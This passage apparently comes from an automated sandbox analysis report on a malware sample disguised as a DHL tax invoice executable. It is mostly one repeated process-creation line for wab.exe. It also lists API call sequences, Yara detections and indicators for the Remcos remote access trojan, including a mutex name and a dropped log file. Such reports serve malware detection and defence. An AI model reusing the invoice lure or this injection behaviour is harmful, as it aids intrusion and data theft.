              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeCode function: 0_2_10001112 GetModuleFileNameW,GlobalAlloc,CharPrevW,GlobalFree,GetTempFileNameW,CopyFileW,CreateFileW,CreateFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,lstrcatW,lstrlenW,GlobalAlloc,FindWindowExW,FindWindowExW,FindWindowExW,lstrcmpiW,DeleteFileW,GetVersion,GlobalAlloc,GlobalLock,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoW,CreateProcessW,GetTickCount,PeekNamedPipe,GetTickCount,ReadFile,lstrlenW,lstrlenW,lstrlenW,lstrcpynW,lstrlenW,GlobalSize,GlobalUnlock,GlobalReAlloc,GlobalLock,lstrcatW,GlobalSize,lstrlenW,lstrcpyW,CharNextW,GetTickCount,TerminateProcess,lstrcpyW,Sleep,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,lstrcpyW,lstrcpyW,wsprintfW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileW,GlobalFree,GlobalFree,GlobalUnlock,GlobalFree,0_2_10001112
              Source: wab.exe, 00000007.00000002.2870944268.00000000089CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerC
              Source: wab.exe, 00000007.00000002.2870944268.00000000089CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: wab.exe, 00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmp, logs.dat.7.drBinary or memory string: [Program Manager]
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeCode function: 0_2_004061A0 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_004061A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.2866475335.0000000002FAF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2870944268.00000000089CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7824, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-EEMA4AJump to behavior
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.2866475335.0000000002FAF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2870944268.00000000089CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7824, type: MEMORYSTR
